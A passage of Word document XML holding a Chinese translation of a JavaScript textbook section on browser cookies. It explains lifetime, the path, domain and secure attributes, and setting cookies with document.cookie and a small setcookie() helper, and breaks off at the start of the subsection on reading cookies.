      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性：有效期和作用域</w:t>
      </w:r>
      <w:bookmarkEnd w:id="511"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>除了名（</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>）和值（</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>还有一些可选的属性来控制</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期和作用域。</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>默认的有效期很短暂；它只能持续在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的会话期间，一旦用户关闭</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>保存的数据就丢失了。要注意的是：这与</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期还是有区别的：</w:t>
      </w:r>
      <w:r>
        <w:t>coookie</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域并不是局限在浏览器的单个窗口中，它的有效期和整个浏览器进程而不是单个浏览器窗口的有效期一致。如果想要延长</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期，可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但是必须要明确告诉浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期是多长（单位是秒）。一旦设置了有效期，浏览器就会将</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>数据存储在一个文件中，并且直到过了指定的有效期才会删除该文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>sesstionStora</w:t>
      </w:r>
      <w:r>
        <w:t>ge</w:t>
      </w:r>
      <w:r>
        <w:t>类似，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域是通过文档源和文档路径来确定的。该作用域通过</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>属性也是可配置的。默认情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>和创建它的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面有关，并对该</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面以及和该</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面同目录或者子目录的其他</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面可见。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.example.com/catalog/index.html</w:t>
      </w:r>
      <w:r>
        <w:t>页面创建了一个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>，那么该</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.example.com/catalog/order.htm</w:t>
      </w:r>
      <w:r>
        <w:t>页面和</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.exam</w:t>
      </w:r>
      <w:r>
        <w:t>ple.com/catalog/widgets/index.html</w:t>
      </w:r>
      <w:r>
        <w:t>页面都是可见的，但它对</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.example.com/about.html</w:t>
      </w:r>
      <w:r>
        <w:t>页面不可见。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>默认的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的可见性行为满足了最常见的需求。不过，有的时候，你可能希望让整个网站都能够使用</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值，而不管是哪个页面创建它的。比方说，当用户在一个页面表单中输入了他的邮件地址，你想将它保存下来，为了下次该用户回到这个页面填写表单，或者在网站其他页面的任何地方要求输入账单地址的时候，将其作为默认的邮件地址。要满足这样的需求，可以</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的路径（设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>属性）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这样一来，来自同一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面，只要其</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>是以指定的路径前缀开始的，都可以共享</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，如果</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.example.com/catalog/widgets/index.html</w:t>
      </w:r>
      <w:r>
        <w:t>页面创建了一个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>，并且将该路径设置成</w:t>
      </w:r>
      <w:r>
        <w:t>"/catalog"</w:t>
      </w:r>
      <w:r>
        <w:t>，那么该</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.example.com/catalog/order.html</w:t>
      </w:r>
      <w:r>
        <w:t>页面也是可见的。或者，如果把路径设置成</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>，那么该</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>对任何</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>这台</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器上的页面都是可见的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的路径设置成</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>等于是让</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>拥有同样的作用域，同时当它请求该站点上任何一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面的时候，浏览器都必须将</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的名字和值传递给服务器。但是，要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>属性不能被用做访问控制机制。如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面想要读取同一站点其他页面的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>，只要简单地将其他页</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>面以隐藏＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的形式加载进来，随后读取对应文档的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>就可以了。同源策略</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）限制了跨站的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>窥探，但是对于同一站点的文档它是完全合法的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的作用域默认由文档源限制。但是，有的大型网站想要子域之间能够互相共享</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>order.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>域下的服务器想要读取</w:t>
      </w:r>
      <w:r>
        <w:t>catalog.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>域下设置的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值。这个时候就需要通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>属性来达到目的。如果</w:t>
      </w:r>
      <w:r>
        <w:t>catalog.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>域下的一个页面创建了一个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>，并将其</w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置成</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>，其</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置成</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>.example.com"</w:t>
      </w:r>
      <w:r>
        <w:t>，那么该</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>就对所有</w:t>
      </w:r>
      <w:r>
        <w:t>catalog.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>orders.example.com</w:t>
      </w:r>
      <w:r>
        <w:t>以及任何其他</w:t>
      </w:r>
      <w:r>
        <w:t>example.com</w:t>
      </w:r>
      <w:r>
        <w:t>域下的任何其他服务器都可见。如果没有为一个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>设置域属性，那么</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>属性的默认值是当前</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的主机名。要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的域只能设置为当前服务器的域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后要介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的属性是</w:t>
      </w:r>
      <w:r>
        <w:t>secure</w:t>
      </w:r>
      <w:r>
        <w:t>，它是一个布尔类型的属性，用来表明</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值以何种形式通过网络传递。</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>默认是以不安全的形式（通过普通的、不安全</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>连接）传递的。而一旦</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>被标识为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>安全的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，那就只能当浏览器和服务器通过</w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t>或者其他的安全协议连接的时候才能传递它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="512" w:name="20_2_2_Bao_Cun_cookie"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>20.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　保存</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="512"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要给当前文档设置默认有效期的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值，非常简单，只须将</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为一个字符串形式的值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name=value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.cookie="version="+encodeURIComponent(document.lastModified);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下次读取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性的时候，之前存储的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对的数据就在文档的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>列表中。由于</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值中的值是不允许包含分号、逗号和空白符，因此，在存储前一般可以采用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>核心的全局函数</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>对值进行编码。相应的，读取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值的时候需要采用</w:t>
      </w:r>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>函数解码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以简单的名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对形式存储的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>数据有效期只在当前</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的会话内，一旦用户关闭浏览器，</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>数据就丢失了。如果想要延长</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期，</w:t>
      </w:r>
      <w:r>
        <w:t>就需要设置</w:t>
      </w:r>
      <w:r>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:t>属性来指定</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的有效期（单位是秒）。按照如下的字符串形式设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>属性即可：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>name=value;max-age=seconds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的函数用来设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值，同时提供一个可选的</w:t>
      </w:r>
      <w:r>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>以名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值的形式存储</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>同时采用</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>函数进行编码，来转义分号、逗号和空白符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>daysToLive</w:t>
      </w:r>
      <w:r>
        <w:t>是一个数字</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:t>属性为该数值表示</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>直到指定的天数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>到了才会过期。如果</w:t>
      </w:r>
      <w:r>
        <w:t>daysToLive</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>就表示删除</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function setcookie(name,value,daysToLive){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var cookie=name+"="+encodeURIComponent(value);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof daysToLive==="number")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cookie+=";max-age="+(daysToLive*60*60*24);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.cookie=cookie;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同样地，如果要设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>secure</w:t>
      </w:r>
      <w:r>
        <w:t>属性，只须在存储</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值前，以如下字符串形式追加在</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>值的后面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>;path=path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>;domain=domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>;secure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>要改变</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值，需要使用相同的名字、路径和域，但是新的值重新设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的值。同样地，设置新</w:t>
      </w:r>
      <w:r>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:t>属性就可以改变原来的</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>的有效期。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要删除一个</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>，需要使用相同的名字、路径和域，然后指定一个任意（非空）的值，并且将</w:t>
      </w:r>
      <w:r>
        <w:t>max-age</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，再次设置</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="513" w:name="20_2_3_Du_Qu_cookie"/>
      <w:r>
        <w:t>20.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　读取</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
